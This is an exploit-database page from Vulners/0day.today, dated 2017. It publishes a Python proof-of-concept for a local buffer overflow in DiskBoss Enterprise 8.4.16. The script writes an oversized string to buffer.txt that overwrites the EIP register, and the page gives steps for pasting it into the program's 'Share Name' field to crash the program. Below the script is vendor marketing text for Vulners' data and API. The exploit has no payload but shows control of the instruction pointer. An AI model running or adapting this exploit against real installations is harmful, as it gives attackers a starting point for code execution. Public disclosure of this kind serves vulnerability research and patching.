Lucene search
K

DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC) Exploit

🗓️ 29 Sep 2017 00:00:00Reported by Touhid M.ShaikhType 
zdt
 zdt
🔗 0day.today👁 22 Views

DiskBoss Enterprise v8.4.16 Local Buffer Overflow (PoC) Exploit by Touhid M.Shaik

Code
#!/usr/bin/python
 
#========================================================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(PoC)
# Date: 28-09-2017
# Website: www.touhidshaikh.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
#   1. Click Server
#   2. Click Connect
#   3. In the "Share Name" field, paste the content of buffer.txt , And try
to connect.........BOOoom....
#
#========================================================================================================================
 
 
junk = "A"*1312
 
EIP = "B"*4 #EIP overwritten
 
b = junk+EIP+"D"*500
 
f = open('buffer.txt','w')
f.write(b)
f.close()

#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation